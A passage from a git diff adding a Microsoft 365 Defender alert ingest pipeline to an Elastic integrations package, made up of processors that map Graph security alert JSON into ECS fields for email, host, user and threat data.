- preserve_duplicate_custom_fields +{{/if}} +{{#each tags as |tag|}} + - {{tag}} +{{/each}} +{{#contains "forwarded" tags}} +publisher_pipeline.disable_host: true +{{/contains}} +{{#if processors}} +processors: +{{processors}} +{{/if}} diff --git a/packages/m365_defender/data_stream/alert/elasticsearch/ingest_pipeline/default.yml b/packages/m365_defender/data_stream/alert/elasticsearch/ingest_pipeline/default.yml new file mode 100644 index 00000000000..1259b5c4eaf --- /dev/null +++ b/packages/m365_defender/data_stream/alert/elasticsearch/ingest_pipeline/default.yml @@ -0,0 +1,2539 @@ +--- +description: Pipeline for processing Alert logs. +processors: + - set: + field: ecs.version + tag: set_ecs_version + value: '8.11.0' + - set: + field: event.kind + tag: set_event_kind + value: alert + - rename: + field: message + tag: rename_message_to_event_original + target_field: event.original + ignore_missing: true + if: ctx.event?.original == null + - json: + field: event.original + tag: json_event_original + target_field: json + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - fingerprint: + fields: + - json.id + - json.lastUpdateDateTime + - json.incidentId + - json.providerAlertId + tag: fingerprint_processor + target_field: _id + ignore_missing: true + - script: + description: Dynamically map event.category and event.type field from evidence. + tag: script_to_set_event_category_and_type + lang: painless + if: ctx.json?.evidence instanceof List + params: + '#microsoft.graph.security.analyzedMessageEvidence': email + '#microsoft.graph.security.mailboxEvidence': email + '#microsoft.graph.security.mailClusterEvidence': email + '#microsoft.graph.security.deviceEvidence': host + '#microsoft.graph.security.fileEvidence': file + '#microsoft.graph.security.ipEvidence': network + '#microsoft.graph.security.processEvidence': process + '#microsoft.graph.security.registryValueEvidence': registry + '#microsoft.graph.security.registryKeyEvidence': registry + '#microsoft.graph.security.userEvidence': iam + '#microsoft.graph.security.securityGroupEvidence': iam + malware: malware + malicioususeractivity: malware + phishing: email + apt: threat + source: > + def eventCategory = new HashSet(); + def eventType = new HashSet(); + for (evidence in ctx.json.evidence) { + String mapping = params[evidence["@odata.type"]]; + if (mapping != null) { + eventCategory.add(mapping); + if(eventCategory.contains('registry')){ + eventType.add('access'); + } + else if(eventCategory.contains('threat')){ + eventType.add('indicator'); + } + else{ + eventType.add('info'); + } + } + } + if(ctx.json?.determination != null){ + String mapping = params[ctx.json.determination.toLowerCase()]; + if(mapping != null) { + eventCategory.add(mapping); + if(eventCategory.contains('threat')){ + eventType.add('indicator'); + } + else{ + eventType.add('info'); + } + } + } + if (!eventType.isEmpty()) { + def type = new ArrayList(); + for(def t:eventType) { + type.add(t); + } + Collections.sort(type); + ctx.event.type = type; + } + if (!eventCategory.isEmpty()) { + def category = new ArrayList(); + for(def c:eventCategory) { + category.add(c); + } + Collections.sort(category); + ctx.event.category = category; + } + - dot_expander: + field: '@odata.type' + tag: dot_expander_@odata_type + path: json + override: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - rename: + field: json.@odata.type + tag: rename_@odata_type + target_field: m365_defender.alert.odata_type + ignore_missing: true + - date: + field: json.lastUpdateDateTime + tag: date_lastUpdateDateTime + formats: + - ISO8601 + if: ctx.json?.lastUpdateDateTime != null && ctx.json.lastUpdateDateTime != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: m365_defender.alert.last_update_datetime + tag: set_last_update_datetime + copy_from: '@timestamp' + ignore_empty_value: true + - rename: + field: json.description + tag: rename_description + target_field: m365_defender.alert.description + ignore_missing: true + - set: + field: message + tag: set_message + copy_from: m365_defender.alert.description + ignore_empty_value: true + - rename: + field: json.tenantId + tag: rename_tenantId + target_field: m365_defender.alert.tenant_id + ignore_missing: true + - set: + field: cloud.account.id + tag: set_cloud_account_id + copy_from: m365_defender.alert.tenant_id + ignore_empty_value: true + - date: + field: json.createdDateTime + tag: date_createdDateTime + target_field: m365_defender.alert.created_datetime + formats: + - ISO8601 + if: ctx.json?.createdDateTime != null && ctx.json.createdDateTime != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: event.created + tag: set_event_created + copy_from: m365_defender.alert.created_datetime + ignore_empty_value: true + - date: + field: json.lastActivityDateTime + tag: date_lastActivityDateTime + target_field: m365_defender.alert.last_activity_datetime + formats: + - ISO8601 + if: ctx.json?.lastActivityDateTime != null && ctx.json.lastActivityDateTime != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: event.end + tag: set_event_end + copy_from: m365_defender.alert.last_activity_datetime + ignore_empty_value: true + - rename: + field: json.id + tag: rename_id + target_field: m365_defender.alert.id + ignore_missing: true + - set: + field: event.id + tag: set_event_id + copy_from: m365_defender.alert.id + ignore_empty_value: true + - rename: + field: json.serviceSource + tag: rename_serviceSource + target_field: m365_defender.alert.service_source + ignore_missing: true + - set: + field: event.provider + tag: set_event_provider + copy_from: m365_defender.alert.service_source + ignore_empty_value: true + - rename: + field: json.severity + tag: rename_severity + target_field: m365_defender.alert.severity + ignore_missing: true + - set: + field: event.severity + tag: set_event_severity_1 + value: 1 + if: ctx.m365_defender?.alert?.severity?.toLowerCase() == 'informational' + - set: + field: event.severity + tag: set_event_severity_2 + value: 2 + if: ctx.m365_defender?.alert?.severity?.toLowerCase() == 'low' + - set: + field: event.severity + tag: set_event_severity_3 + value: 3 + if: ctx.m365_defender?.alert?.severity?.toLowerCase() == 'medium' + - set: + field: event.severity + tag: set_event_severity_4 + value: 4 + if: ctx.m365_defender?.alert?.severity?.toLowerCase() == 'high' + - date: + field: json.firstActivityDateTime + tag: date_firstActivityDateTime + target_field: m365_defender.alert.first_activity_datetime + formats: + - ISO8601 + if: ctx.json?.firstActivityDateTime != null && ctx.json.firstActivityDateTime != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: event.start + tag: set_event_start + copy_from: m365_defender.alert.first_activity_datetime + ignore_empty_value: true + - script: + description: Determine event.duration from starting and ending activity timestamp. + tag: script_event_duration + lang: painless + if: ctx.event?.start != null && ctx.event?.end != null + source: + Instant eventstart = ZonedDateTime.parse(ctx.event?.start).toInstant(); + Instant eventend = ZonedDateTime.parse(ctx.event?.end).toInstant(); + ctx.event['duration'] = ChronoUnit.NANOS.between(eventstart, eventend); + - uri_parts: + field: json.alertWebUrl + tag: uri_parts_alertWebUrl + target_field: m365_defender.alert.web_url + if: ctx.json?.alertWebUrl != null + keep_original: true + on_failure: + - remove: + field: json.alertWebUrl + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: event.url + tag: set_event_url + copy_from: m365_defender.alert.web_url.original + ignore_empty_value: true + - rename: + field: json.assignedTo + tag: rename_assignedTo + target_field: m365_defender.alert.assigned_to + ignore_missing: true + - append: + field: related.user + tag: append_related_user + value: '{{{m365_defender.alert.assigned_to}}}' + if: ctx.m365_defender?.alert?.assigned_to != null + allow_duplicates: false + - set: + field: source.user.name + tag: set_source_user_name + copy_from: m365_defender.alert.assigned_to + ignore_empty_value: true + - rename: + field: json.threatFamilyName + tag: rename_threatFamilyName + target_field: m365_defender.alert.threat_family_name + ignore_missing: true + - set: + field: threat.group.name + tag: set_threat_group_name + copy_from: m365_defender.alert.threat_family_name + ignore_empty_value: true + - rename: + field: json.category + tag: rename_category + target_field: m365_defender.alert.category + ignore_missing: true + - append: + field: threat.tactic.name + tag: append_threat_tactic_name + value: '{{{m365_defender.alert.category}}}' + if: ctx.m365_defender?.alert?.category != null + allow_duplicates: false + - rename: + field: json.mitreTechniques + tag: rename_mitreTechniques + target_field: m365_defender.alert.mitre_techniques + ignore_missing: true + - set: + field: threat.technique.subtechnique.id + tag: set_threat_technique_subtechnique_id + copy_from: m365_defender.alert.mitre_techniques + ignore_empty_value: true + - rename: + field: json.actorDisplayName + tag: rename_actorDisplayName + target_field: m365_defender.alert.actor_display_name + ignore_missing: true + - rename: + field: json.classification + tag: rename_classification + target_field: m365_defender.alert.classification + ignore_missing: true + - foreach: + field: json.comments + tag: foreach_comments + if: ctx.json?.comments instanceof List + processor: + append: + field: related.user + tag: foreach_comments_append_createdByDisplayName + value: '{{{_ingest._value.createdByDisplayName}}}' + allow_duplicates: false + - rename: + field: json.comments + tag: rename_comments + target_field: m365_defender.alert.comments + ignore_missing: true + - rename: + field: json.detectorId + tag: rename_detectorId + target_field: m365_defender.alert.detector_id + ignore_missing: true + - rename: + field: json.detectionSource + tag: rename_detection_source + target_field: m365_defender.alert.detection_source + ignore_missing: true + - rename: + field: json.determination + tag: rename_determination + target_field: m365_defender.alert.determination + ignore_missing: true + - foreach: + field: json.evidence + tag: foreach_evidence_createdDateTime + if: ctx.json?.evidence instanceof List + processor: + date: + field: _ingest._value.createdDateTime + tag: date_foreach_evidence_createdDateTime + target_field: _ingest._value.created_datetime + formats: + - ISO8601 + on_failure: + - remove: + field: _ingest._value.createdDateTime + ignore_missing: true + - foreach: + field: json.evidence + tag: foreach_evidence_remediationStatus + if: ctx.json?.evidence instanceof List + processor: + rename: + field: _ingest._value.remediationStatus + tag: foreach_rename_remediationStatus + target_field: _ingest._value.remediation_status + ignore_missing: true + - foreach: + field: json.evidence + tag: foreach_evident_ipInterfaces + if: ctx.json?.evidence instanceof List + processor: + foreach: + field: _ingest._value.ipInterfaces + tag: inside_foreach_convert_ipInterfaces + ignore_missing: true + processor: + convert: + field: _ingest._value + tag: foreach_convert_ipInterfaces + type: ip + ignore_missing: true + on_failure: + - remove: + field: _ingest._value + ignore_missing: true + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - foreach: + field: json.evidence + tag: foreach_evidence_ip_interfaces + if: ctx.json?.evidence instanceof List + processor: + rename: + field: _ingest._value.ipInterfaces + tag: rename_foreach_ip_interfaces + target_field: _ingest._value.ip_interfaces + ignore_missing: true + - foreach: + field: json.evidence + tag: foreach_evidence_detailedRoles + if: ctx.json?.evidence instanceof List + processor: + rename: + field: _ingest._value.detailedRoles + tag: rename_foreach_detailedRoles + target_field: _ingest._value.detailed_roles + ignore_missing: true + - foreach: + field: json.evidence + tag: foreach_rename_remediationStatusDetails + if: ctx.json?.evidence instanceof List + processor: + rename: + field: _ingest._value.remediationStatusDetails + tag: rename_foreach_remediationStatusDetails + target_field: _ingest._value.remediation_status_details + ignore_missing: true + - rename: + field: json.incidentId + tag: rename_incidentId + target_field: m365_defender.alert.incident_id + ignore_missing: true + - uri_parts: + field: json.incidentWebUrl + tag: uri_parts_incidentWebUrl + target_field: m365_defender.alert.incident_web_url + if: ctx.json?.incidentWebUrl != null + keep_original: true + on_failure: + - remove: + field: json.incidentWebUrl + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - rename: + field: json.providerAlertId + tag: rename_providerAlertId + target_field: m365_defender.alert.provider_alert_id + ignore_missing: true + - rename: + field: json.recommendedActions + tag: rename_recommendedActions + target_field: m365_defender.alert.recommended_actions + ignore_missing: true + - date: + field: json.resolvedDateTime + tag: date_resolvedDateTime + target_field: m365_defender.alert.resolved_datetime + formats: + - ISO8601 + if: ctx.json?.resolvedDateTime != null && ctx.json.resolvedDateTime != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - rename: + field: json.status + tag: rename_status + target_field: m365_defender.alert.status + ignore_missing: true + - rename: + field: json.threatDisplayName + tag: rename_threatDisplayName + target_field: m365_defender.alert.threat_display_name + ignore_missing: true + - rename: + field: json.title + tag: rename_title + target_field: m365_defender.alert.title + ignore_missing: true + - foreach: + field: json.evidence + tag: foreach_evidence_dot_expander + if: ctx.json?.evidence instanceof List + processor: + dot_expander: + field: '@odata.type' + path: _ingest._value + ignore_failure: true + override: true + - foreach: + field: json.evidence + tag: foreach_evidence_@0data + if: ctx.json?.evidence instanceof List + processor: + rename: + field: _ingest._value.@odata.type + tag: foreach_rename_evidence_@odata + target_field: _ingest._value.odata_type + ignore_missing: true + - foreach: + field: json.evidence + tag: foreach_evidence_receivedDateTime + if: ctx.json?.evidence instanceof List + processor: + date: + field: _ingest._value.receivedDateTime + tag: date_foreach_evidence_receivedDateTime + target_field: _ingest._value.received_datetime + formats: + - ISO8601 + on_failure: + - remove: + field: _ingest._value.receivedDateTime + ignore_missing: true + - foreach: + field: json.evidence + tag: foreach_evidence_append_email_Delivery_timestamp + if: ctx.json?.evidence instanceof List + processor: + append: + field: email.delivery_timestamp + tag: append_foreach_evidence_email_Delivery_timestamp + value: '{{{_ingest._value.received_datetime}}}' + allow_duplicates: false + - foreach: + field: json.evidence + tag: foreach_evidence_antiSpamDirection + if: ctx.json?.evidence instanceof List + processor: + rename: + field: _ingest._value.antiSpamDirection + tag: rename_foreach_antispam_direction + target_field: _ingest._value.antispam_direction + ignore_missing: true + - foreach: + field: json.evidence + tag: foreach_evidence_append_email_direction + if: ctx.json?.evidence instanceof List + processor: + append: + field: email.direction + tag: append_foreach_evidence_email_direction + value: '{{{_ingest._value.antispam_direction}}}' + allow_duplicates: false + - foreach: + field: json.evidence + tag: foreach_evidence_append_email_subject + if: ctx.json?.evidence instanceof List + processor: + append: + field: email.subject + tag: append_foreach_evidence_email_subject + value: '{{{_ingest._value.subject}}}' + allow_duplicates: false + - foreach: + field: json.evidence + tag: foreach_evidence_rename_recipientEmailAddress + if: ctx.json?.evidence instanceof List + processor: + rename: + field: _ingest._value.recipientEmailAddress + tag: rename_foreach_evidence_recipientEmailAddress + target_field: _ingest._value.recipient_email_address + ignore_missing: true + - foreach: + field: json.evidence + tag: foreach_evidence_append_related_user + if: ctx.json?.evidence instanceof List + processor: + append: + field: related.user + tag: append_foreach_evidence_related_user + value: '{{{_ingest._value.recipient_email_address}}}' + allow_duplicates: false + - foreach: + field: json.evidence + tag: foreach_evidence_append_email_to_address + if: ctx.json?.evidence instanceof List + processor: + append: + field: email.to.address + tag: append_foreach_evidence_email_to_address + value: '{{{_ingest._value.recipient_email_address}}}' + allow_duplicates: false + - foreach: + field: json.evidence + tag: foreach_convert_evidence_attachmentsCount + if: ctx.json?.evidence instanceof List + processor: + convert: + field: _ingest._value.attachmentsCount + tag: convert_foreach_evidence_attachmentsCount + target_field: _ingest._value.attachments_count + type: long + ignore_missing: true + on_failure: + - remove: + field: _ingest._value.attachmentsCount + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - foreach: + field: json.evidence + tag: foreach_rename_deliveryAction + if: ctx.json?.evidence instanceof List + processor: + rename: + field: _ingest._value.deliveryAction + tag: rename_foreach_evidence_deliveryAction + target_field: _ingest._value.delivery_action + ignore_missing: true + - foreach: + field: json.evidence + tag: foreach_rename_evidence_deliveryLocation + if: ctx.json?.evidence instanceof List + processor: + rename: + field: _ingest._value.deliveryLocation + tag: rename_foreach_evidence_deliveryLocation + target_field: _ingest._value.delivery_location + ignore_missing: true + - foreach: + field: json.evidence + tag: foreach_rename_evidence_internetMessageId + if: ctx.json?.evidence instanceof List + processor: + rename: + field: _ingest._value.internetMessageId + tag: rename_foreach_evidence_internetMessageId + target_field: _ingest._value.internet_message_id + ignore_missing: true + - foreach: + field: json.evidence + tag: foreach_rename_evidence_networkMessageId + if: ctx.json?.evidence instanceof List + processor: + rename: + field: _ingest._value.networkMessageId + tag: rename_foreach_evidence_networkMessageId + target_field: _ingest._value.network_message_id + ignore_missing: true + - foreach: + field: json.evidence + tag: foreach_dot_expander_evidence_p1Sender + if: ctx.json?.evidence instanceof List + processor: + dot_expander: + field: '@odata.type' + path: _ingest._value.p1Sender + ignore_failure: true + override: true + - foreach: + field: json.evidence + tag: foreach_rename_evidence_odata_type + if: ctx.json?.evidence instanceof List + processor: + rename: + field: _ingest._value.p1Sender.@odata.type + tag: rename_foreach_evidence_odata_type + target_field: _ingest._value.p1_sender.odata_type + ignore_missing: true + - foreach: + field: json.evidence + tag: foreach_rename_evidence_p2Sender + if: ctx.json?.evidence instanceof List + processor: + dot_expander: + field: '@odata.type' + path: _ingest._value.p2Sender + ignore_failure: true + override: true + - foreach: + field: json.evidence + tag: foreach_rename_evidence_p2Sender_odata_type + if: ctx.json?.evidence instanceof List + processor: + rename: + field: _ingest._value.p2Sender.@odata.type + tag: rename_foreach_evidence_p2Sender_odata_type + target_field: _ingest._value.p2_sender.odata_type + ignore_missing: true + - foreach: + field: json.evidence + tag: foreach_rename_evidence_displayName + if: ctx.json?.evidence instanceof List + processor: + rename: + field: _ingest._value.p1Sender.displayName + tag: rename_foreach_p2Sender_displayName + target_field: _ingest._value.p1_sender.display_name + ignore_missing: true + - foreach: + field: json.evidence + tag: foreach_evidence_append_p1Sender_Display_name + if: ctx.json?.evidence instanceof List + processor: + append: + field: related.user + tag: append_foreach_evidence_p1Sender_Display_name + value: '{{{_ingest._value.p1_sender.display_name}}}' + allow_duplicates: false + - foreach: + field: json.evidence + tag: foreach_evidence_rename_p1sender_domain_name + if: ctx.json?.evidence instanceof List + processor: + rename: + field: _ingest._value.p1Sender.domainName + tag: rename_foreach_evidence_p1sender_domainName + target_field: _ingest._value.p1_sender.domain_name + ignore_missing: true + - foreach: + field: json.evidence + tag: foreach_rename_evidence_append_related_hosts_p1sender_domain_name + if: ctx.json?.evidence instanceof List + processor: + append: + field: related.hosts + tag: append_foreach_rename_evidence_related_hosts_p1sender_domain_name + value: '{{{_ingest._value.p1_sender.domain_name}}}' + allow_duplicates: false + - foreach: + field: json.evidence + tag: foreach_rename_evidence_p1sender_emailAddress + if: ctx.json?.evidence instanceof List + processor: + rename: + field: _ingest._value.p1Sender.emailAddress + tag: rename_foreach_evidence_p1sender_emailaddress + target_field: _ingest._value.p1_sender.email_address + ignore_missing: true + - foreach: + field: json.evidence + tag: foreach_evidence_append_email_from_adress + if: ctx.json?.evidence instanceof List + processor: + append: + field: email.from.address + tag: append_foreach_evidence_email_from_adress + value: '{{{_ingest._value.p1_sender.email_address}}}' + allow_duplicates: false + - foreach: + field: json.evidence + tag: foreach_append_evidence_related_user_p1sender_emailaddress + if: ctx.json?.evidence instanceof List + processor: + append: + field: related.user + tag: append_foreach_evidence_related_user_p1sender_emailaddress + value: '{{{_ingest._value.p1_sender.email_address}}}' + allow_duplicates: false + - foreach: + field: json.evidence + tag: foreach_rename_evidence_p2sender_displayname + if: ctx.json?.evidence instanceof List + processor: + rename: + field: _ingest._value.p2Sender.displayName + tag: rename_foreach_evidence_p2sender_displayname + target_field: _ingest._value.p2_sender.display_name + ignore_missing: true + - foreach: + field: json.evidence + tag: foreach_evidence_append_user_p2sender_display_name + if: ctx.json?.evidence instanceof List + processor: + append: + field: related.user + tag: append_foreach_evidence_user_p2sender_display_name + value: '{{{_ingest._value.p2_sender.display_name}}}' + allow_duplicates: false + - foreach: + field: json.evidence + tag: foreach_evidence_rename_p2sender_domain_name + if: ctx.json?.evidence instanceof List + processor: + rename: + field: _ingest._value.p2Sender.domainName + tag: rename_foreach_evidence_p2sender_domain_name + target_field: _ingest._value.p2_sender.domain_name + ignore_missing: true + - foreach: + field: json.evidence + tag: foreach_evidence_append_hosts_p2sender_domain_name + if: ctx.json?.evidence instanceof List + processor: + append: + field: related.hosts + tag: append_foreach_evidence_hosts_p2sender_domain_name + value: '{{{_ingest._value.p2_sender.domain_name}}}' + allow_duplicates: false + - foreach: + field: json.evidence + tag: foreach_evidence_rename_p2sender_email_address + if: ctx.json?.evidence instanceof List + processor: + rename: + field: _ingest._value.p2Sender.emailAddress + tag: rename_foreach_evidence_p2sender_emailAddress + target_field: _ingest._value.p2_sender.email_address + ignore_missing: true + - foreach: + field: json.evidence + tag: foreach_append_evidence_p2sender_emailaddress + if: ctx.json?.evidence instanceof List + processor: + append: + field: email.from.address + tag: append_foreach_evidence_p2sender_emailaddress + value: '{{{_ingest._value.p2_sender.email_address}}}' + allow_duplicates: false + - foreach: + field: json.evidence + tag: foreach_append_user_p2sender_email_address + if: ctx.json?.evidence instanceof List + processor: + append: + field: related.user + tag: append_foreach_user_p2sender_email_address + value: '{{{_ingest._value.p2_sender.email_address}}}' + allow_duplicates: false + - foreach: + field: json.evidence + tag: foreach_evidence_convert_senderIp + if: ctx.json?.evidence instanceof List + processor: + convert: + field: _ingest._value.senderIp + tag: convert_foreach_evidence_senderIp + target_field: _ingest._value.sender_ip + type: ip + ignore_missing: true + on_failure: + - remove: + field: _ingest._value.senderIp + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - foreach: + field: json.evidence + tag: foreach_evidence_append_related_ip_sender_ip + if: ctx.json?.evidence instanceof List + processor: + append: + field: related.ip + tag: append_foreach_evidence_related_ip_sender_ip + value: '{{{_ingest._value.sender_ip}}}' + allow_duplicates: false + - foreach: + field: json.evidence + tag: foreach_evidence_rename_threatDetectionMethods + if: ctx.json?.evidence instanceof List + processor: + rename: + field: _ingest._value.threatDetectionMethods + tag: rename_foreach_evidence_threatDetectionMethods + target_field: _ingest._value.threat_detection_methods + ignore_missing: true + - foreach: + field: json.evidence + tag: foreach_evidence_convert_urlCount + if: ctx.json?.evidence instanceof List + processor: + convert: + field: _ingest._value.urlCount + tag: convert_foreach_evidence_urlCount + target_field: _ingest._value.url_count + type: long + ignore_missing: true + on_failure: + - remove: + field: _ingest._value.urlCount + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - foreach: + field: json.evidence + tag: foreach_evidence_convert_instanceId + if: ctx.json?.evidence instanceof List + processor: + convert: + field: _ingest._value.instanceId + tag: convert_foreach_evidence_instanceId + target_field: _ingest._value.instance_id + type: string + ignore_missing: true + on_failure: + - remove: + field: _ingest._value.instanceId + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - foreach: + field: json.evidence + tag: foreach_evidence_append_cloud_instance_id + if: ctx.json?.evidence instanceof List + processor: + append: + field: cloud.instance.id + tag: append_foreach_evidence_cloud_instance_id + value: '{{{_ingest._value.instance_id}}}' + allow_duplicates: false + - foreach: + field: json.evidence + tag: foreach_rename_evidence_instanceName + if: ctx.json?.evidence instanceof List + processor: + rename: + field: _ingest._value.instanceName + tag: rename_foreach_evidence_instanceName + target_field: _ingest._value.instance_name + ignore_missing: true + - foreach: + field: json.evidence + tag: foreach_evidence_append_cloud_instance_name + if: ctx.json?.evidence instanceof List + processor: + append: + field: cloud.instance.name + tag: append_foreach_evidence_cloud_instance_name + value: '{{{_ingest._value.instance_name}}}' + allow_duplicates: false + - foreach: + field: json.evidence + tag: foreach_evidence_convert_appId + if: ctx.json?.evidence instanceof List + processor: + convert: + field: _ingest._value.appId + tag: convert_foreach_evidence_appID + target_field: _ingest._value.app_id + type: string + ignore_missing: true + on_failure: + - remove: + field: _ingest._value.appId + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - foreach: + field: json.evidence + tag: foreach_evidence_rename_displayName + if: ctx.json?.evidence instanceof List + processor: + rename: + field: _ingest._value.displayName + tag: rename_foreach_evidence_display_name + target_field: _ingest._value.display_name + ignore_missing: true + - foreach: + field: json.evidence + tag: foreach_evidence_convert_saasAppId + if: ctx.json?.evidence instanceof List + processor: + convert: + field: _ingest._value.saasAppId + tag: convert_foreach_evidence_saasAppId + target_field: _ingest._value.saas_app_id + type: string + ignore_missing: true + on_failure: + - remove: + field: _ingest._value.saasAppId + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - foreach: + field: json.evidence + tag: foreach_evidence_rename_vmMetadata_cloudProvider + if: ctx.json?.evidence instanceof List + processor: + rename: + field: _ingest._value.vmMetadata.cloudProvider + tag: rename_foreach_evidence_vmMetadata_cloudProvider + target_field: _ingest._value.vm_metadata.cloud_provider + ignore_missing: true + - foreach: + field: json.evidence + tag: foreach_evidence_rename_mdaDeviceId + if: ctx.json?.evidence instanceof List + processor: + rename: + field: _ingest._value.mdeDeviceId + tag: rename_foreach_evidence_mdaDeviceId + target_field: _ingest._value.mde_device_id + ignore_missing: true + - foreach: + field: json.evidence + tag: foreach_evidence_append_mdaDeviceId_into_related_hosts + if: ctx.json?.evidence instanceof List + processor: + append: + field: related.hosts + tag: append_foreach_evidence_mdaDeviceId_into_related_hosts + value: '{{{_ingest._value.mde_device_id}}}' + allow_duplicates: false + - foreach: + field: json.evidence + tag: foreach_evidence_rename_osPlatform + if: ctx.json?.evidence instanceof List + processor: + rename: + field: _ingest._value.osPlatform + tag: rename_foreach_osPlatform + target_field: _ingest._value.os_platform + ignore_missing: true + - foreach: + field: json.evidence + tag: foreach_evidence_append_host_os_name + if: ctx.json?.evidence instanceof List + processor: + append: + field: host.os.name + tag: append_foreach_evidence_host_os_name + value: '{{{_ingest._value.os_platform}}}' + allow_duplicates: false + - foreach: + field: json.evidence + tag: foreach_evidence_append_os_platform_related_hosts + if: ctx.json?.evidence instanceof List + processor: + append: + field: related.hosts + tag: append_foreach_evidence_os_platform_related_hosts + value: '{{{_ingest._value.os_platform}}}' + allow_duplicates: false + - foreach: + field: json.evidence + tag: foreach_append_host_os_version + if: ctx.json?.evidence instanceof List + processor: + append: + field: host.os.version + tag: append_foreach_host_os_version + value: '{{{_ingest._value.version}}}' + allow_duplicates: false + - foreach: + field: json.evidence + tag: foreach_append_version_into_related_hosts + if: ctx.json?.evidence instanceof List + processor: + append: + field: related.hosts + tag: append_foreach_version_into_related_hosts + value: '{{{_ingest._value.version}}}' + allow_duplicates: false + - foreach: + field: json.evidence + tag: foreach_rename_evidence_azureAdDeviceId + if: ctx.json?.evidence instanceof List + processor: + rename: + field: _ingest._value.azureAdDeviceId + tag: rename_foreach_evidence_azureAdDeiveId + target_field: _ingest._value.azure_ad_device_id + ignore_missing: true + - foreach: + field: json.evidence + tag: foreach_evidence_rename_defenderAvStatus + if: ctx.json?.evidence instanceof List + processor: + rename: + field: _ingest._value.defenderAvStatus + tag: rename_foreach_evidence_defenderAvStatus + target_field: _ingest._value.defender_av_status + ignore_missing: true + - foreach: + field: json.evidence + tag: foreach_evidence_rename_deviceDnsName + if: ctx.json?.evidence instanceof List + processor: + rename: + field: _ingest._value.deviceDnsName + tag: rename_foreach_evidece_deviceDnsName + target_field: _ingest._value.device_dns_name + ignore_missing: true + - foreach: + field: json.evidence + tag: foreach_evidence_append_hosts_device_dns_name + if: ctx.json?.evidence instanceof List + processor: + append: + field: related.hosts + tag: append_foreach_evidence_hosts_device_dns_name + value: '{{{_ingest._value.device_dns_name}}}' + allow_duplicates: false + - foreach: + field: json.evidence + tag: foreach_date_firstSeenDateTime + if: ctx.json?.evidence instanceof List + processor: + date: + field: _ingest._value.firstSeenDateTime + tag: date_foreach_firstSeenDateTime + target_field: _ingest._value.first_seen_datetime + formats: + - ISO8601 + on_failure: + - remove: + field: _ingest._value.firstSeenDateTime + ignore_missing: true + - foreach: + field: json.evidence + tag: foreach_evidence_rename_healthStatus + if: ctx.json?.evidence instanceof List + processor: + rename: + field: _ingest._value.healthStatus + tag: rename_foreach_evidence_healthStatus + target_field: _ingest._value.health_status + ignore_missing: true + - foreach: + field: json.evidence + tag: double_foreach_evidence__rename_accountName + if: ctx.json?.evidence instanceof List + processor: + foreach: + field: _ingest._value.loggedOnUsers + tag: inside_foreach_evidence_loggedOnUSers_rename_accountName + ignore_missing: true + processor: + rename: + field: _ingest._value.accountName + tag: rename_foreach_evidence_accountName + target_field: _ingest._value.account_name + ignore_missing: true + - foreach: + field: json.evidence + tag: double_foreach_evidence_append_loggedOnUsers_account_name + if: ctx.json?.evidence instanceof List + processor: + foreach: + field: _ingest._value.loggedOnUsers + tag: inside_foreach_append_loggedOnUsers_account_name + ignore_missing: 